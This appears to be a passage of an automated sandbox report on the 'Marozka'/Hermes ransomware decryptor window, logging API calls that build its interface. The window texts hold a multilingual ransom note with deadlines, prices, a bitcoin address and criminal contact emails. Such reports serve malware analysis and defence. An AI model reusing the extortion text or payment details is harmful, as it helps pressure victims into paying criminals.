Create Mapping - protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map - process_name = c:\fd1hvy\hermes-decrypter-new.exe, address_out = 0x0 False 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = FD1HVy True 9
Fn
Window (267)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create .NET-BroadcastEventWindow.4.0.0.0.141b42a.0 class_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, wndproc_parameter = 0 True 1
Fn
Create TimerNativeWindow class_name = WindowsForms10.Window.0.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create knyaz@cock.li class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Support2: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create suporthermes@cock.li class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Support1: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Good day!!! All files on your computer are encrypted. Decoding files is only possible with our help !!! You need to pay within 48 hours to decrypt your files in accordance with the tariff of your country. Tariffs are indicated in the window from the left !!! And contact us after paying for your individual decryption key by contact below: If this does not happen then after 72 hours all your files will be lost. In addition, we use your computer in their illegal actions. And how much your computer is bought by you and in accordance with your legislation country is your property. And you will be criminally responsible for our actions))) Hurry to pay class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Buona giornata! Tutti i file sul tuo computer sono crittografati. La decodifica dei file è possibile solo con il nostro aiuto !!! Devi pagare entro 48 ore per decifrare il tuo file in conformità con la tariffa del tuo paese. Le tariffe sono indicate nella finestra da sinistra !!! E contattaci dopo aver pagato la tua chiave di decodifica individuale per contatto di seguito: Se ciò non accade, dopo 72 ore tutti i file andranno persi. Inoltre, usiamo il tuo computer nelle loro azioni illegali. E quanto il tuo computer è stato acquistato da te e in conformità con la tua legislazione il paese è di tua proprietà E sarai criminalmente responsabile delle nostre azioni))) Sbrigati a pagare class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create 美好的一天! 您计算机上的所有文件都已加密。 只有在我们的帮助下才能解码文件! 您需要在48小时内付款才能解密 根据您所在国家/地区的关税文件。 从左边的窗口显示关税!!! 通过以下联系方式支付您的个人解密密钥后,请与我们联系: 如果没有发生这种情况,那么72小时后您的所有文件都将丢失。 此外,我们使用您的计算机进行非法操作。 您的电脑是根据您的法律购买了多少 国家是你的财产。 你将对我们的行为承担刑事责任))) 快点付钱 class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Guten tag Alle Dateien auf Ihrem Computer werden verschlüsselt. Das Entschlüsseln von Dateien ist nur mit unserer Hilfe möglich !!! Sie müssen innerhalb von 48 Stunden bezahlen, um Ihre Daten zu entschlüsseln Dateien in Übereinstimmung mit dem Tarif Ihres Landes. Tarife werden im Fenster von links angezeigt !!! Und kontaktieren Sie uns nach der Bezahlung Ihres individuellen Entschlüsselungsschlüssels per Kontakt: Geschieht dies nicht, gehen nach 72 Stunden alle Ihre Dateien verloren. Darüber hinaus verwenden wir Ihren Computer in ihren illegalen Handlungen. Und wie viel Ihr Computer von Ihnen gekauft wird und in Übereinstimmung mit Ihrer Gesetzgebung Land ist Ihr Eigentum. Und Sie werden für unsere Handlungen strafrechtlich verantwortlich sein))) Beeilen Sie sich zu bezahlen class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Open Decryptor class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Next 24 hours class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create $300 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Cost of class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create first 24 hours class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create $150 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Cost of class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Send dollars to this address bitcoins class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create 1Cm6VtFJmJGVLiaUh5WVKWau7QhJhtkj3G class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Copy BTC class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Доброго времени суток!!! Все файлы на вашем компьютере зашифрованы. Расшифровать фалы возможно только при нашей помощи!!! Вам необходимо в течение 48 часов произвести оплату для расшифровки ваших файлов в соответствие с тарифом вашей страны. Тарифы указанны в окошке с лева!!! И обратиться к нам после оплаты за вашим индивидуальным ключем расшифровки по контактам ниже: Если этого не произойдет то через 72 часа все ваши файлы будут утеряны. К тому же мы используем ваш компьютер в своих не законных действиях. А по сколько ваш компьютер куплен вами и в соответствие с законодательством вашей страны является вашей собственностью. И нести уголовную ответственность за наши действия будете вы))) Поспешите произвести оплату class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Sorry! Your files have been encrypted! class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create English class_name = WindowsForms10.COMBOBOX.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create 00:00:00 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Name class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Helloy - class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create WindowsFormsParkingWindow class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.0.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create knyaz@cock.li class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Support2: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create suporthermes@cock.li class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Support1: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Good day!!! All files on your computer are encrypted. Decoding files is only possible with our help !!! You need to pay within 48 hours to decrypt your files in accordance with the tariff of your country. Tariffs are indicated in the window from the left !!! And contact us after paying for your individual decryption key by contact below: If this does not happen then after 72 hours all your files will be lost. In addition, we use your computer in their illegal actions. And how much your computer is bought by you and in accordance with your legislation country is your property. And you will be criminally responsible for our actions))) Hurry to pay class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Buona giornata! Tutti i file sul tuo computer sono crittografati. La decodifica dei file è possibile solo con il nostro aiuto !!! Devi pagare entro 48 ore per decifrare il tuo file in conformità con la tariffa del tuo paese. Le tariffe sono indicate nella finestra da sinistra !!! E contattaci dopo aver pagato la tua chiave di decodifica individuale per contatto di seguito: Se ciò non accade, dopo 72 ore tutti i file andranno persi. Inoltre, usiamo il tuo computer nelle loro azioni illegali. E quanto il tuo computer è stato acquistato da te e in conformità con la tua legislazione il paese è di tua proprietà E sarai criminalmente responsabile delle nostre azioni))) Sbrigati a pagare class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create 美好的一天! 您计算机上的所有文件都已加密。 只有在我们的帮助下才能解码文件! 您需要在48小时内付款才能解密 根据您所在国家/地区的关税文件。 从左边的窗口显示关税!!! 通过以下联系方式支付您的个人解密密钥后,请与我们联系: 如果没有发生这种情况,那么72小时后您的所有文件都将丢失。 此外,我们使用您的计算机进行非法操作。 您的电脑是根据您的法律购买了多少 国家是你的财产。 你将对我们的行为承担刑事责任))) 快点付钱 class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Guten tag Alle Dateien auf Ihrem Computer werden verschlüsselt. Das Entschlüsseln von Dateien ist nur mit unserer Hilfe möglich !!! Sie müssen innerhalb von 48 Stunden bezahlen, um Ihre Daten zu entschlüsseln Dateien in Übereinstimmung mit dem Tarif Ihres Landes. Tarife werden im Fenster von links angezeigt !!! Und kontaktieren Sie uns nach der Bezahlung Ihres individuellen Entschlüsselungsschlüssels per Kontakt: Geschieht dies nicht, gehen nach 72 Stunden alle Ihre Dateien verloren. Darüber hinaus verwenden wir Ihren Computer in ihren illegalen Handlungen. Und wie viel Ihr Computer von Ihnen gekauft wird und in Übereinstimmung mit Ihrer Gesetzgebung Land ist Ihr Eigentum. Und Sie werden für unsere Handlungen strafrechtlich verantwortlich sein))) Beeilen Sie sich zu bezahlen class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Open Decryptor class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Next 24 hours class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create $300 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Cost of class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create first 24 hours class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create $150 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Cost of class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Send dollars to this address bitcoins class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create 1Cm6VtFJmJGVLiaUh5WVKWau7QhJhtkj3G class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Copy BTC class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Доброго времени суток!!! Все файлы на вашем компьютере зашифрованы. Расшифровать фалы возможно только при нашей помощи!!! Вам необходимо в течение 48 часов произвести оплату для расшифровки ваших файлов в соответствие с тарифом вашей страны. Тарифы указанны в окошке с лева!!! И обратиться к нам после оплаты за вашим индивидуальным ключем расшифровки по контактам ниже: Если этого не произойдет то через 72 часа все ваши файлы будут утеряны. К тому же мы используем ваш компьютер в своих не законных действиях. А по сколько ваш компьютер куплен вами и в соответствие с законодательством вашей страны является вашей собственностью. И нести уголовную ответственность за наши действия будете вы))) Поспешите произвести оплату class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Sorry! Your files have been encrypted! class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create English class_name = WindowsForms10.COMBOBOX.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create 00:00:00 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Name class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Helloy - class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create Key class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create 100% decryption guarantee class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Password: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Decrypt My Files class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Key class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create 100% decryption guarantee class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Password: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Decrypt My Files class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Key class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create 100% decryption guarantee class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 False 1
Fn
Create - class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Password: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Decrypt My Files class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Key class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create 100% decryption guarantee class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create - class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Password: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Create Decrypt My Files class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, wndproc_parameter = 0 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88361614 True 1
Fn
Set Attribute TimerNativeWindow class_name = WindowsForms10.Window.0.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute TimerNativeWindow class_name = WindowsForms10.Window.0.app.0.141b42a_r11_ad1, index = -4, new_long = 88362414 True 1
Fn
Set Attribute Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88362454 True 1
Fn
Set Attribute Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -8, new_long = 0 False 1
Fn
Set Attribute Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -16, new_long = 33619968 True 1
Fn
Set Attribute Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -20, new_long = 327808 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88362494 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -12, new_long = 458830 False 1
Fn
Set Attribute knyaz@cock.li class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute knyaz@cock.li class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 88362574 True 1
Fn
Set Attribute knyaz@cock.li class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -12, new_long = 262672 False 1
Fn
Set Attribute Support2: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Support2: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88362654 True 1
Fn
Set Attribute Support2: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 524464 False 1
Fn
Set Attribute suporthermes@cock.li class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute suporthermes@cock.li class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 88362694 True 1
Fn
Set Attribute suporthermes@cock.li class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -12, new_long = 328190 False 1
Fn
Set Attribute Support1: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Support1: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88362734 True 1
Fn
Set Attribute Support1: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 458820 False 1
Fn
Set Attribute Good day!!! All files on your computer are encrypted. Decoding files is only possible with our help !!! You need to pay within 48 hours to decrypt your files in accordance with the tariff of your country. Tariffs are indicated in the window from the left !!! And contact us after paying for your individual decryption key by contact below: If this does not happen then after 72 hours all your files will be lost. In addition, we use your computer in their illegal actions. And how much your computer is bought by you and in accordance with your legislation country is your property. And you will be criminally responsible for our actions))) Hurry to pay class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute Good day!!! All files on your computer are encrypted. Decoding files is only possible with our help !!! You need to pay within 48 hours to decrypt your files in accordance with the tariff of your country. Tariffs are indicated in the window from the left !!! And contact us after paying for your individual decryption key by contact below: If this does not happen then after 72 hours all your files will be lost. In addition, we use your computer in their illegal actions. And how much your computer is bought by you and in accordance with your legislation country is your property. And you will be criminally responsible for our actions))) Hurry to pay class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 88362774 True 1
Fn
Set Attribute Good day!!! All files on your computer are encrypted. Decoding files is only possible with our help !!! You need to pay within 48 hours to decrypt your files in accordance with the tariff of your country. Tariffs are indicated in the window from the left !!! And contact us after paying for your individual decryption key by contact below: If this does not happen then after 72 hours all your files will be lost. In addition, we use your computer in their illegal actions. And how much your computer is bought by you and in accordance with your legislation country is your property. And you will be criminally responsible for our actions))) Hurry to pay class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -12, new_long = 524310 False 1
Fn
Set Attribute Buona giornata! Tutti i file sul tuo computer sono crittografati. La decodifica dei file è possibile solo con il nostro aiuto !!! Devi pagare entro 48 ore per decifrare il tuo file in conformità con la tariffa del tuo paese. Le tariffe sono indicate nella finestra da sinistra !!! E contattaci dopo aver pagato la tua chiave di decodifica individuale per contatto di seguito: Se ciò non accade, dopo 72 ore tutti i file andranno persi. Inoltre, usiamo il tuo computer nelle loro azioni illegali. E quanto il tuo computer è stato acquistato da te e in conformità con la tua legislazione il paese è di tua proprietà E sarai criminalmente responsabile delle nostre azioni))) Sbrigati a pagare class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute Buona giornata! Tutti i file sul tuo computer sono crittografati. La decodifica dei file è possibile solo con il nostro aiuto !!! Devi pagare entro 48 ore per decifrare il tuo file in conformità con la tariffa del tuo paese. Le tariffe sono indicate nella finestra da sinistra !!! E contattaci dopo aver pagato la tua chiave di decodifica individuale per contatto di seguito: Se ciò non accade, dopo 72 ore tutti i file andranno persi. Inoltre, usiamo il tuo computer nelle loro azioni illegali. E quanto il tuo computer è stato acquistato da te e in conformità con la tua legislazione il paese è di tua proprietà E sarai criminalmente responsabile delle nostre azioni))) Sbrigati a pagare class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 88343734 True 1
Fn
Set Attribute Buona giornata! Tutti i file sul tuo computer sono crittografati. La decodifica dei file è possibile solo con il nostro aiuto !!! Devi pagare entro 48 ore per decifrare il tuo file in conformità con la tariffa del tuo paese. Le tariffe sono indicate nella finestra da sinistra !!! E contattaci dopo aver pagato la tua chiave di decodifica individuale per contatto di seguito: Se ciò non accade, dopo 72 ore tutti i file andranno persi. Inoltre, usiamo il tuo computer nelle loro azioni illegali. E quanto il tuo computer è stato acquistato da te e in conformità con la tua legislazione il paese è di tua proprietà E sarai criminalmente responsabile delle nostre azioni))) Sbrigati a pagare class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -12, new_long = 131598 False 1
Fn
Set Attribute 美好的一天! 您计算机上的所有文件都已加密。 只有在我们的帮助下才能解码文件! 您需要在48小时内付款才能解密 根据您所在国家/地区的关税文件。 从左边的窗口显示关税!!! 通过以下联系方式支付您的个人解密密钥后,请与我们联系: 如果没有发生这种情况,那么72小时后您的所有文件都将丢失。 此外,我们使用您的计算机进行非法操作。 您的电脑是根据您的法律购买了多少 国家是你的财产。 你将对我们的行为承担刑事责任))) 快点付钱 class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute 美好的一天! 您计算机上的所有文件都已加密。 只有在我们的帮助下才能解码文件! 您需要在48小时内付款才能解密 根据您所在国家/地区的关税文件。 从左边的窗口显示关税!!! 通过以下联系方式支付您的个人解密密钥后,请与我们联系: 如果没有发生这种情况,那么72小时后您的所有文件都将丢失。 此外,我们使用您的计算机进行非法操作。 您的电脑是根据您的法律购买了多少 国家是你的财产。 你将对我们的行为承担刑事责任))) 快点付钱 class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 88375774 True 1
Fn
Set Attribute 美好的一天! 您计算机上的所有文件都已加密。 只有在我们的帮助下才能解码文件! 您需要在48小时内付款才能解密 根据您所在国家/地区的关税文件。 从左边的窗口显示关税!!! 通过以下联系方式支付您的个人解密密钥后,请与我们联系: 如果没有发生这种情况,那么72小时后您的所有文件都将丢失。 此外,我们使用您的计算机进行非法操作。 您的电脑是根据您的法律购买了多少 国家是你的财产。 你将对我们的行为承担刑事责任))) 快点付钱 class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -12, new_long = 262620 False 1
Fn
Set Attribute Guten tag Alle Dateien auf Ihrem Computer werden verschlüsselt. Das Entschlüsseln von Dateien ist nur mit unserer Hilfe möglich !!! Sie müssen innerhalb von 48 Stunden bezahlen, um Ihre Daten zu entschlüsseln Dateien in Übereinstimmung mit dem Tarif Ihres Landes. Tarife werden im Fenster von links angezeigt !!! Und kontaktieren Sie uns nach der Bezahlung Ihres individuellen Entschlüsselungsschlüssels per Kontakt: Geschieht dies nicht, gehen nach 72 Stunden alle Ihre Dateien verloren. Darüber hinaus verwenden wir Ihren Computer in ihren illegalen Handlungen. Und wie viel Ihr Computer von Ihnen gekauft wird und in Übereinstimmung mit Ihrer Gesetzgebung Land ist Ihr Eigentum. Und Sie werden für unsere Handlungen strafrechtlich verantwortlich sein))) Beeilen Sie sich zu bezahlen class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute Guten tag Alle Dateien auf Ihrem Computer werden verschlüsselt. Das Entschlüsseln von Dateien ist nur mit unserer Hilfe möglich !!! Sie müssen innerhalb von 48 Stunden bezahlen, um Ihre Daten zu entschlüsseln Dateien in Übereinstimmung mit dem Tarif Ihres Landes. Tarife werden im Fenster von links angezeigt !!! Und kontaktieren Sie uns nach der Bezahlung Ihres individuellen Entschlüsselungsschlüssels per Kontakt: Geschieht dies nicht, gehen nach 72 Stunden alle Ihre Dateien verloren. Darüber hinaus verwenden wir Ihren Computer in ihren illegalen Handlungen. Und wie viel Ihr Computer von Ihnen gekauft wird und in Übereinstimmung mit Ihrer Gesetzgebung Land ist Ihr Eigentum. Und Sie werden für unsere Handlungen strafrechtlich verantwortlich sein))) Beeilen Sie sich zu bezahlen class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 88375454 True 1
Fn
Set Attribute Guten tag Alle Dateien auf Ihrem Computer werden verschlüsselt. Das Entschlüsseln von Dateien ist nur mit unserer Hilfe möglich !!! Sie müssen innerhalb von 48 Stunden bezahlen, um Ihre Daten zu entschlüsseln Dateien in Übereinstimmung mit dem Tarif Ihres Landes. Tarife werden im Fenster von links angezeigt !!! Und kontaktieren Sie uns nach der Bezahlung Ihres individuellen Entschlüsselungsschlüssels per Kontakt: Geschieht dies nicht, gehen nach 72 Stunden alle Ihre Dateien verloren. Darüber hinaus verwenden wir Ihren Computer in ihren illegalen Handlungen. Und wie viel Ihr Computer von Ihnen gekauft wird und in Übereinstimmung mit Ihrer Gesetzgebung Land ist Ihr Eigentum. Und Sie werden für unsere Handlungen strafrechtlich verantwortlich sein))) Beeilen Sie sich zu bezahlen class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -12, new_long = 393510 False 1
Fn
Set Attribute Open Decryptor class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, index = -4, new_long = 1876224000 True 1
Fn
Set Attribute Open Decryptor class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, index = -4, new_long = 88375334 True 1
Fn
Set Attribute Open Decryptor class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, index = -12, new_long = 131602 False 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88375214 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -12, new_long = 590346 False 1
Fn
Set Attribute Next 24 hours class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Next 24 hours class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88375014 True 1
Fn
Set Attribute Next 24 hours class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 459276 False 1
Fn
